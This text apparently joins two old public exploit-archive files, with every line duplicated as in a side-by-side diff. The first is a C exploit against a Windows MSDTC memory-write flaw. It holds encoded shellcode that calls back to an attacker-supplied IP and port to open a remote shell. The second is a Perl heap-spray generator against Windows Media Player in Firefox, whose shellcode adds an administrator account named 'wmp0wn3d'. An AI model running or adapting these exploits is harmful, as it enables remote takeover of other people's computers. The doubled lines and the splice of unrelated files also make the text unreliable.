(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00 }; (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00 };
char peer0_2[300] = { char peer0_2[300] = {
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xfd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd,
(char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0x24, (char)0x00, (char)0x8f, (char)0x00, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0x24, (char)0x00, (char)0x8f, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00 }; (char)0x00, (char)0x00, (char)0x00, (char)0x00 };
#define ip_offset (213+22) #define ip_offset (213+22)
#define port_offset (208+22) #define port_offset (208+22)
unsigned char realsc[] = unsigned char realsc[] =
"\xEB\x0F\x5B\x33\xC9\x66\xb9\xaa\x04\x80\x33\x99\x43\xE2\xFA\xEB" "\xEB\x0F\x5B\x33\xC9\x66\xb9\xaa\x04\x80\x33\x99\x43\xE2\xFA\xEB"
"\x05\xE8\xEC\xFF\xFF\xFF" "\x05\xE8\xEC\xFF\xFF\xFF"
"\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85" "\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A" "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A" "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC" "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58" "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12" "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71" "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3" "\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10" "\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12" "\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12"
"\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98" "\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98"
"\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE" "\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE"
"\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99" "\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99"
"\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65" "\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65"
"\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66" "\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66"
"\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC" "\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC"
"\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC" "\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC"
"\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED" "\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB" "\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB"
"\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA" "\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA"
"\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99"; "\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99";
struct ostype struct ostype
{ {
DWORD TopSEH; DWORD TopSEH;
char description[255]; char description[255];
}; };
ostype OS[] = { ostype OS[] = {
{0x684191c4, "Write NdrserverCall2 pointer From 0x990058"}, {0x684191c4, "Write NdrserverCall2 pointer From 0x990058"},
{0x684191c4, "Write NdrserverCall2 pointer From 0x980058"}, {0x684191c4, "Write NdrserverCall2 pointer From 0x980058"},
{0, NULL} {0, NULL}
}; };
DWORD BaseImage[]={0x990058, 0x980058}; DWORD BaseImage[]={0x990058, 0x980058};
void MakeShell(char *ip, int port) void MakeShell(char *ip, int port)
{ {
//make shellcode //make shellcode
unsigned short tp = htons(port)^(u_short)0x9999; unsigned short tp = htons(port)^(u_short)0x9999;
unsigned long ti = inet_addr(ip)^0x99999999; unsigned long ti = inet_addr(ip)^0x99999999;
memcpy(&realsc[port_offset], &tp, 2); memcpy(&realsc[port_offset], &tp, 2);
memcpy(&realsc[ip_offset], &ti, 4); memcpy(&realsc[ip_offset], &ti, 4);
} }
SOCKET ConnectTo(char *ip, int port) SOCKET ConnectTo(char *ip, int port)
{ {
WSADATA wsaData; WSADATA wsaData;
SOCKET s; SOCKET s;
struct hostent *he; struct hostent *he;
struct sockaddr_in host; struct sockaddr_in host;
int nTimeout = 5000; int nTimeout = 5000;
if(WSAStartup(0x0101,&wsaData) != 0) if(WSAStartup(0x0101,&wsaData) != 0)
{ {
printf("error starting winsock.."); printf("error starting winsock..");
exit(-1); exit(-1);
} }
if((he = gethostbyname(ip)) == 0) if((he = gethostbyname(ip)) == 0)
{ {
printf("Failed resolving '%s'", ip); printf("Failed resolving '%s'", ip);
exit(-1); exit(-1);
} }
host.sin_port = htons(port); host.sin_port = htons(port);
host.sin_family = AF_INET; host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr); host.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{ {
printf("Failed creating socket"); printf("Failed creating socket");
exit(-1); exit(-1);
} }
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1) if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{ {
printf("Failed connecting to host\r\n"); printf("Failed connecting to host\r\n");
exit(-1); exit(-1);
} }
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout)); setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
return s; return s;
} }
void Disconnect(SOCKET s) void Disconnect(SOCKET s)
{ {
closesocket(s); closesocket(s);
WSACleanup(); WSACleanup();
} }
void WriteFakeLength(DWORD fakelen) //should > 0x22b void WriteFakeLength(DWORD fakelen) //should > 0x22b
{ {
*(DWORD*)(peer0_1+15*8) = fakelen/2; *(DWORD*)(peer0_1+15*8) = fakelen/2;
} }
void BuildShell(char *ip, int port) void BuildShell(char *ip, int port)
{ {
MakeShell(ip, port); MakeShell(ip, port);
memcpy(peer0_1 + 132, realsc, sizeof(realsc)); memcpy(peer0_1 + 132, realsc, sizeof(realsc));
} }
void BuildContext(char*ip, int port) void BuildContext(char*ip, int port)
{ {
SOCKET s = ConnectTo(ip, port); SOCKET s = ConnectTo(ip, port);
//SOCKET s = ConnectTo("202.119.9.191", 2288); //SOCKET s = ConnectTo("202.119.9.191", 2288);
send(s, peer0_0, sizeof(peer0_0), 0); send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000]; char buf[5000];
WriteFakeLength(1200); WriteFakeLength(1200);
recv(s, buf, sizeof(buf), 0); recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0); send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0); send(s, peer0_2, sizeof(peer0_2), 0);
memset(buf, 0, sizeof(buf)); memset(buf, 0, sizeof(buf));
recv(s, buf, sizeof(buf), 0); recv(s, buf, sizeof(buf), 0);
Disconnect(s); Disconnect(s);
if(buf[8] != 0x5c) if(buf[8] != 0x5c)
{ {
printf("Target not support! Quiting...."); printf("Target not support! Quiting....");
exit(0); exit(0);
} }
Sleep(500); Sleep(500);
} }
void help(char *n) void help(char *n)
{ {
printf("-=[ SST ]=------------------------------------\n"); printf("-=[ SST ]=------------------------------------\n");
printf(" MSDTC Arbitrary Opposite Memory Write Flaw\n"); printf(" MSDTC Arbitrary Opposite Memory Write Flaw\n");
printf("----------------------------------------------\n"); printf("----------------------------------------------\n");
printf("Usage:\n"); printf("Usage:\n");
printf(" %s [Taget IP] [Target Port] [Your IP] [Your Port] <type>\n\ntype:\n", n); printf(" %s [Taget IP] [Target Port] [Your IP] [Your Port] <type>\n\ntype:\n", n);
int i=0; int i=0;
while(OS[i].TopSEH) while(OS[i].TopSEH)
{ {
printf(" %d %s\n", i, OS[i].description); printf(" %d %s\n", i, OS[i].description);
i++; i++;
} }
} }
void main(int argc, char *argv[]) void main(int argc, char *argv[])
{ {
if(argc < 5) if(argc < 5)
{ {
help(argv[0]); help(argv[0]);
return; return;
} }
int itype = 0; int itype = 0;
int b = 0; int b = 0;
if(argc == 5) if(argc == 5)
b = atoi(argv[5]); b = atoi(argv[5]);
char *ip = argv[1]; char *ip = argv[1];
int port = atoi(argv[2]); int port = atoi(argv[2]);
printf("(^_^) Start exploiting journey!\n"); printf("(^_^) Start exploiting journey!\n");
//build context, copy shellcode to heap //build context, copy shellcode to heap
BuildContext(ip, port); BuildContext(ip, port);
BuildContext(ip, port); BuildContext(ip, port);
BuildContext(ip, port); BuildContext(ip, port);
BuildShell(argv[3], atoi(argv[4])); BuildShell(argv[3], atoi(argv[4]));
BuildContext(ip, port); BuildContext(ip, port);
BuildContext(ip, port); BuildContext(ip, port);
BuildContext(ip, port); BuildContext(ip, port);
//finish building //finish building
printf("(^_^) Context built!\n"); printf("(^_^) Context built!\n");
SOCKET s = ConnectTo(ip, port); SOCKET s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0); send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000]; char buf[5000];
WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4); WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4);
recv(s, buf, sizeof(buf), 0); recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0); send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0); send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s); Disconnect(s);
printf("(^_^) Function pointer wrote!\n"); printf("(^_^) Function pointer wrote!\n");
//trigger //trigger
printf("(*_*) Trigger fault..."); printf("(*_*) Trigger fault...");
Sleep(500); Sleep(500);
s = ConnectTo(ip, port); s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0); send(s, peer0_0, sizeof(peer0_0), 0);
//WriteFakeLength(0x80811102-BaseImage[b]-4); //WriteFakeLength(0x80811102-BaseImage[b]-4);
WriteFakeLength(0x226); WriteFakeLength(0x226);
recv(s, buf, sizeof(buf), 0); recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0); send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0); send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s); Disconnect(s);
printf("Done!\n(*_*) Any shell?"); printf("Done!\n(*_*) Any shell?");
} }
// milw0rm.com [2005-12-01] // milw0rm.com [2005-12-01]


@ -1,121 +1,121 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# wmp-profiteer.pl # wmp-profiteer.pl
# Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit # Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit
# By Matthew Murphy (mattmurphy@kc.rr.com) # By Matthew Murphy (mattmurphy@kc.rr.com)
# #
# It's come to my attention that the HTML versions of the exploit posted on # It's come to my attention that the HTML versions of the exploit posted on
# several sites have become mangled. Notables include SecuriTeam and FrSIRT. # several sites have become mangled. Notables include SecuriTeam and FrSIRT.
# Neither one, though, can beat SecurityFocus, whose links to the exploits # Neither one, though, can beat SecurityFocus, whose links to the exploits
# for this issue are both 404s. # for this issue are both 404s.
# #
# I haven't updated the underlying exploit methodology -- it's still a shameless # I haven't updated the underlying exploit methodology -- it's still a shameless
# rip of Skylined's heap spray technique, but now the shellcode can be # rip of Skylined's heap spray technique, but now the shellcode can be
# customized! # customized!
# #
# The usage of this tool is as follows: # The usage of this tool is as follows:
# #
# wmp-profiteer.pl [shellcode] # wmp-profiteer.pl [shellcode]
# #
# The shellcode that comes with this has the same payload as the original. # The shellcode that comes with this has the same payload as the original.
# If it's successful against you, you'll have an administrator account named # If it's successful against you, you'll have an administrator account named
# 'wmp0wn3d' with a password of 'password'. This, of course, assumes that # 'wmp0wn3d' with a password of 'password'. This, of course, assumes that
# you're running the vulnerable application as an administrator. There's a # you're running the vulnerable application as an administrator. There's a
# lesson in that: run as a Limited User or at least tie down your browsers # lesson in that: run as a Limited User or at least tie down your browsers
# with Software Restriction. # with Software Restriction.
# #
# This will drop 'wmp-exploit.html' in the current directory. When the HTML # This will drop 'wmp-exploit.html' in the current directory. When the HTML
# document is opened locally or viewed remotely by a vulnerable web browser # document is opened locally or viewed remotely by a vulnerable web browser
# (Firefox on Windows), the exploit code will run and gain control of the # (Firefox on Windows), the exploit code will run and gain control of the
# browser. # browser.
# #
# The standard disclaimer from the original exploit still applies, with some # The standard disclaimer from the original exploit still applies, with some
# changes: # changes:
# #
# This exploit code is intended only as a demonstration tool for # This exploit code is intended only as a demonstration tool for
# educational or testing purposes. It is not intended to be used for any # educational or testing purposes. It is not intended to be used for any
# unauthorized or illicit purpose. Any testing done with this tool OR ANY # unauthorized or illicit purpose. Any testing done with this tool OR ANY
# PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or # PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or
# are explicitly authorized to test. # are explicitly authorized to test.
# #
# By utilizing or possessing this code, you assume any and all # By utilizing or possessing this code, you assume any and all
# responsibility for damage that results. The author will not be held # responsibility for damage that results. The author will not be held
# responsible, under any circumstances, for damage that arises from your # responsible, under any circumstances, for damage that arises from your
# possession or use of this code. # possession or use of this code.
$part1 = $part1 =
"<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\"> "<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\">
<HTML> <HTML>
<HEAD> <HEAD>
<TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE> <TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE>
<SCRIPT> <SCRIPT>
var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\"); var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\");
do { do {
spray += spray; spray += spray;
} while (spray.length < 0x1000000); } while (spray.length < 0x1000000);
spray += unescape(\""; spray += unescape(\"";
$part2 = $part2 =
"\"); "\");
</SCRIPT> </SCRIPT>
</HEAD> </HEAD>
<BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\"> <BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\">
<EMBED SRC=\""; <EMBED SRC=\"";
$part3 = $part3 =
"\"></EMBED> "\"></EMBED>
</BODY> </BODY>
</HTML>"; </HTML>";
if (@ARGV != 1) { if (@ARGV != 1) {
print STDERR "Usage: $0 [shellcode file]"; print STDERR "Usage: $0 [shellcode file]";
} }
open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html for writing."; open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html for writing.";
print EXPLOIT $part1; print EXPLOIT $part1;
open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found."; open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found.";
while (!eof(SHELLCODE)) { while (!eof(SHELLCODE)) {
$ch1 = getc(SHELLCODE); $ch1 = getc(SHELLCODE);
if (eof(SHELLCODE)) { if (eof(SHELLCODE)) {
print EXPLOIT "%u00"; print EXPLOIT "%u00";
print EXPLOIT sprintf("%%u00%.2x", ord($ch1)); print EXPLOIT sprintf("%%u00%.2x", ord($ch1));
} else { } else {
$ch2 = getc(SHELLCODE); $ch2 = getc(SHELLCODE);
print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1)); print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1));
} }
} }
close(SHELLCODE); close(SHELLCODE);
print EXPLOIT $part2; print EXPLOIT $part2;
print EXPLOIT "-"x2038; print EXPLOIT "-"x2038;
print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL"; print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL";
print EXPLOIT "AAA\x05"; print EXPLOIT "AAA\x05";
print EXPLOIT "NNNNOOOO"; print EXPLOIT "NNNNOOOO";
print EXPLOIT "AAA\x05"; print EXPLOIT "AAA\x05";
print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"; print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv";
print EXPLOIT $part3; print EXPLOIT $part3;
close(EXPLOIT); close(EXPLOIT);
----------------------------------------------- shellcode.hex ----------------------------------------- ----------------------------------------------- shellcode.hex -----------------------------------------
:020000040000FA :020000040000FA
:100000002BC983E9C9D9EED97424F45B8173132118 :100000002BC983E9C9D9EED97424F45B8173132118
:10001000C414F183EBFCE2F4DD2C50F121C49FB455 :10001000C414F183EBFCE2F4DD2C50F121C49FB455
:100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861 :100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861
:10003000AAF09FF0CFF5D4688D40D4852605DEFC6C :10003000AAF09FF0CFF5D4688D40D4852605DEFC6C
:100040002006FF051A9030F554219FAE05C5FF9795 :100040002006FF051A9030F554219FAE05C5FF9795
